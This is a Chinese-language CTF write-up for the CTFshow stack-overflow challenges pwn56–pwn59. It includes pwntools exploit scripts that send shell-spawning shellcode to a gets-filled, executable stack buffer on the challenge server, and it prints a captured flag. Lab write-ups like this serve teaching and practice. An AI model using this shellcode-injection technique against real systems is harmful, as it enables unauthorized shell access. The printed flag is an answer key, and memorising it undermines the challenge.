CTFshow-PWN-栈溢出（pwn56-pwn59）

pwn56 和 pwn57 分别为 32 位 和 64 位的 shellcode

系统调用 execve("/bin/sh",NULL,NULL)

pwn56 伪代码

汇编代码 

 pwn57 伪代码

汇编代码

二者都是连上就可以直接交互

因为 execve 的参数已经配置好了

exp：

# @author：My6n
# @time：20250614
from pwn import *
#context(arch = 'i386',os = 'linux',log_level = 'debug')
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = process('./pwn')
io.interactive()

接下来我们看 pwn58

main 函数无法反编译

我们直接看汇编

在栈帧初始化阶段，开辟了 0xA0 的空间，也就是 160 字节大小

注意看标红的部分：

[ebp+s] 其实就是 [ebp - 0xA0] 即 s 的地址

这里在调用 ctfshow 函数后，会 call s 这个地址

那么就会执行 s 指向内存里面的代码

我们再来看一下 ctfshow 函数：

gets 函数的参数就是 s

换句话说，我们输入的内容会被当做代码直接执行 

由于 char s[160] 在栈上，我们检查一下程序：

没有开 NX 保护，那么可以执行

我们直接将 shellcode 写进去即可

exp：

# @author：My6n
# @time：20250614
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28119)
shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()

读取 flag 

拿到 flag：ctfshow{cab1b4e4-8b6f-458f-89fc-2bd86bc01bd9}

pwn59 同理，只不过是 64 位

exp：

# @author：My6n
# @time：20250614
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28252)
shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()